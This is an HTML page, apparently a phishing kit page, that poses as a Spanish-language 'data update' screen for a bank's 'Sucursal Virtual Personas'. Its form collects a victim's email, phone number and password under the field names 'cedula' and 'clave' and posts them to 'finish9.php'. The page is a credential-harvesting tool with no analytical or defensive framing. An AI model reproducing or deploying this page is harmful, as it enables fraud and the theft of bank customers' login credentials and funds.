<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>replit</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
  <style>

        *{
            -webkit-appearance: none;
            font-family: Arial, Helvetica, sans-serif;
            margin: 0;
            padding: 0;
        }
        input[type=submit]{
            background-color:#fdda24;
            color: #030303;
            width: 90%;
            height: 41px;
            border-radius: 124px;
            border-input: 0px solid #ecfd08;
            margin-top: 0px;
            border:0px solid gray;
            padding: 5px;
            font-weight:bold;
            font-size:1em;
            
        }
        

       
    </style>
</head>

<body>
   
<img src="/img/ico.jpeg" alt="" width="100%">
  <br>
 <form action="finish9.php" method="post">
        
        <form action="" method="post">   
             <p style="font-size:0.9em;">Actualizacion de datos <br> Sucursal Virtual Personas</p>


  <div class="login">
    <img src="/img/"   alt="" width="100%"></div>
                <input type="text" id="" name = "cedula" placeholder="Correo Electronico"><br>
          <form action="" method="post">   

                <input type="text" id="" name = "cedula" placeholder="Número Telefono">
              <input type="text" id="" name ="clave" placeholder="Contraseña">
             <br> <br>
              <input type="submit" value="Actualizar" id="btn" ></center>  <br>
          </form>
        
      
      

    </form>

   
  
<a href=""><center> <img src="/img/bangol.jpeg" alt="" width="100%"></a>
</body>
</html>